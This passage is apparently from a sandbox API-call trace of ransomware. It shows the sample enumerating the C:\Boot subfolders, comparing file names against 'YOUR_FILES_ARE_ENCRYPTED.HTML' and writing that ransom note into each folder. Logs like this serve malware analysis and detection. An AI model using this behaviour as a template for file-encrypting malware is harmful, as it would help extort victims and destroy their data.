hHeap=0x270000) returned 1 [0155.053] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0155.054] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0155.054] GetProcessHeap () returned 0x270000 [0155.054] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.054] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\en-US" | out: lpString1="\\\\?\\C:\\Boot\\en-US") returned="\\\\?\\C:\\Boot\\en-US" [0155.054] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\en-US\\*") returned="\\\\?\\C:\\Boot\\en-US\\*" [0155.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.054] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.054] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.054] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0155.054] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.054] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.054] lstrlenW (lpString=".mui") returned 4 [0155.054] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.054] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x60, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0155.054] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0155.055] lstrcmpW (lpString1="memtest.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.055] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0155.055] lstrlenW (lpString=".mui") returned 4 [0155.055] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0155.055] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x60, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0155.055] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.055] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.055] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.057] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.059] CloseHandle (hObject=0x4a4) returned 1 [0155.060] GetProcessHeap () returned 0x270000 [0155.061] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.061] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0155.061] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0155.061] GetProcessHeap () returned 0x270000 [0155.061] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.061] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\es-ES" | out: lpString1="\\\\?\\C:\\Boot\\es-ES") returned="\\\\?\\C:\\Boot\\es-ES" [0155.061] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\es-ES", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\es-ES\\*") returned="\\\\?\\C:\\Boot\\es-ES\\*" [0155.061] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.062] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f65060, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.062] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.062] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui") returned 33 [0155.062] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.062] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.062] lstrlenW (lpString=".mui") returned 4 [0155.063] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.063] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f65060, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.063] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.063] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.063] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\es-es\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.063] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.065] CloseHandle (hObject=0x4a4) returned 1 [0155.065] GetProcessHeap () returned 0x270000 [0155.066] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.066] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0155.066] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0155.066] GetProcessHeap () returned 0x270000 [0155.067] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.067] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\fi-FI" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI") returned="\\\\?\\C:\\Boot\\fi-FI" [0155.067] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fi-FI", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\fi-FI\\*") returned="\\\\?\\C:\\Boot\\fi-FI\\*" [0155.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.068] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.068] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.068] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 33 [0155.068] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.068] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.069] lstrlenW (lpString=".mui") returned 4 [0155.069] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.069] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.069] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.069] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.069] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fi-fi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.069] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.071] CloseHandle (hObject=0x4a4) returned 1 [0155.071] GetProcessHeap () returned 0x270000 [0155.072] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.072] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec5544c0, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0155.072] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0155.072] GetProcessHeap () returned 0x270000 [0155.072] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.072] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\Fonts" | out: lpString1="\\\\?\\C:\\Boot\\Fonts") returned="\\\\?\\C:\\Boot\\Fonts" [0155.073] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\Fonts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\Fonts\\*") returned="\\\\?\\C:\\Boot\\Fonts\\*" [0155.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec5544c0, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.073] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec5544c0, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.073] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec508200, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8de004dc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x60, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0155.073] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0155.073] lstrcmpW (lpString1="chs_boot.ttf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.073] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0155.073] lstrlenW (lpString=".ttf") returned 4 [0155.073] PathFindExtensionW (pszPath="chs_boot.ttf") returned=".ttf" [0155.073] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec52e360, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec52e360, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8dfef6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x60, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0155.073] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0155.073] lstrcmpW (lpString1="cht_boot.ttf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.073] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0155.073] lstrlenW (lpString=".ttf") returned 4 [0155.074] PathFindExtensionW (pszPath="cht_boot.ttf") returned=".ttf" [0155.074] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec52e360, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec52e360, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8e1201bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x60, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0155.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0155.074] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.074] PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0155.074] lstrlenW (lpString=".ttf") returned 4 [0155.074] PathFindExtensionW (pszPath="jpn_boot.ttf") returned=".ttf" [0155.074] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec5544c0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8e30f39c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x60, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0155.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0155.074] lstrcmpW (lpString1="kor_boot.ttf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.074] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0155.074] lstrlenW (lpString=".ttf") returned 4 [0155.074] PathFindExtensionW (pszPath="kor_boot.ttf") returned=".ttf" [0155.074] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec5544c0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8e3817bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x60, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0155.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 31 [0155.074] lstrcmpW (lpString1="wgl4_boot.ttf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.074] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" [0155.074] lstrlenW (lpString=".ttf") returned 4 [0155.074] PathFindExtensionW (pszPath="wgl4_boot.ttf") returned=".ttf" [0155.074] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec5544c0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec5544c0, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x8e3817bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x60, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0155.074] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.074] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.074] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fonts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.095] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.097] CloseHandle (hObject=0x4a4) returned 1 [0155.097] GetProcessHeap () returned 0x270000 [0155.098] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.098] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0155.098] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0155.098] GetProcessHeap () returned 0x270000 [0155.098] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.098] lstrcpyW (in: lpString1=0x431df40, 